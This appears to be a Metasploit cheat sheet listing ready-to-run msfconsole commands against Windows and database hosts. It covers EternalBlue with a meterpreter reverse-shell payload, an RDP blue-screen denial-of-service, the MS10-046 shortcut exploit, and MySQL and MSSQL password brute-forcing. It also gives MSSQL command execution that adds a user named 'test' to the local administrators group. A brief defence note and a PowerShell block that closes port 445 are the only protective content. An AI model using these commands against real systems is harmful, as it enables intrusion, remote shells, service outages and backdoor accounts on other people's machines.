
Some modules in msfconsole

EternalBlue (MS17-010):

[port 445 open]

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set rhost ip

run

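Defence:
Disable the SMB service (network file sharing) on port 445
Enable the firewall and configure an inbound rule for connections on port 445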
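
The two defences above, plus turning off SMBv1 (the protocol version the MS17-010 bulletin covers, a step this page does not list), as an added example that is not part of the original page. It assumes Windows 8 / Server 2012 or later, an elevated PowerShell session, and a host that does not need to serve file shares; the rule name is made up for the example.

```powershell
#Requires -RunAsAdministrator
# Added example: close off inbound SMB (TCP 445) on a Windows host.
# Assumption: this host does not need to share files or printers.

$ruleName = 'Block inbound SMB 445 (example)'   # constructed rule name

# 1. Turn off the SMBv1 server if it is still enabled.
if ((Get-SmbServerConfiguration).EnableSMB1Protocol) {
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
}
# Record the result now, before the Server service is stopped in step 4.
$smb1Enabled = (Get-SmbServerConfiguration).EnableSMB1Protocol

# 2. Make sure the firewall is enabled on every profile.
Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled True

# 3. Add the inbound block rule once. In Windows Firewall a block rule
#    takes precedence over any existing allow rule for the same traffic.
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Inbound `
        -Protocol TCP -LocalPort 445 -Action Block -Profile Any | Out-Null
}

# 4. Stop the Server service so nothing listens on 445 at all.
#    This removes all file and printer sharing from the host.
Stop-Service -Name LanmanServer -Force
Set-Service  -Name LanmanServer -StartupType Disabled

# 5. Report the resulting state so the change can be checked.
$listener = Get-NetTCPConnection -LocalPort 445 -State Listen -ErrorAction SilentlyContinue
[pscustomobject]@{
    SMB1Enabled    = $smb1Enabled
    FirewallRule   = (Get-NetFirewallRule -DisplayName $ruleName).Action
    ListeningOn445 = [bool]$listener
    ServerService  = (Get-Service -Name LanmanServer).Status
}
```

On a host that must keep serving shares, skip step 4 and scope the firewall rule instead of blocking all inbound connections.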


Blue-screen attack (MS12-020):

[port 3389 open]

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

set rhost ip

run


File sharing (MS10-046):

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

set srvhost kaliip

run


MySQL brute-force login:

Probe:

use auxiliary/scanner/mysql/mysql_version

set rhosts ip

run


Login:

use auxiliary/scanner/mysql/mysql_login

set rhosts ip

set pass_file password.txt

set user_file user.txt

run

mssql:

Finding the MSSQL port:

use auxiliary/scanner/mssql/mssql_ping

set rhost ip

run


(nmap -sV ip can also be used, but the results are poor)


MSSQL brute force:

use auxiliary/scanner/mssql/mssql_login

set rhost ip

set pass_file password.txt

set rport x

run

MSSQL command execution (adding an account):

use auxiliary/admin/mssql/mssql_exec

set rhost ip

set rport x

set cmd cmd.exe /c net user test 123 /add

run

set cmd cmd.exe /c net localgroup administrators test /add

run